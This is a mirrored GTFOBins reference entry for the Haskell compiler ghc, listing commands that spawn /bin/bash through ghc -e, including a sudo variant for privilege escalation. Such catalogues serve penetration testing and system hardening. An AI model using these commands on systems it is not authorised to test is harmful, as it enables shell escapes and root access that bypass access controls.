mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 07:19:08 +01:00
8 lines
161 B
Markdown
8 lines
161 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
|
|
sudo:
|
|
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
|
|
---
|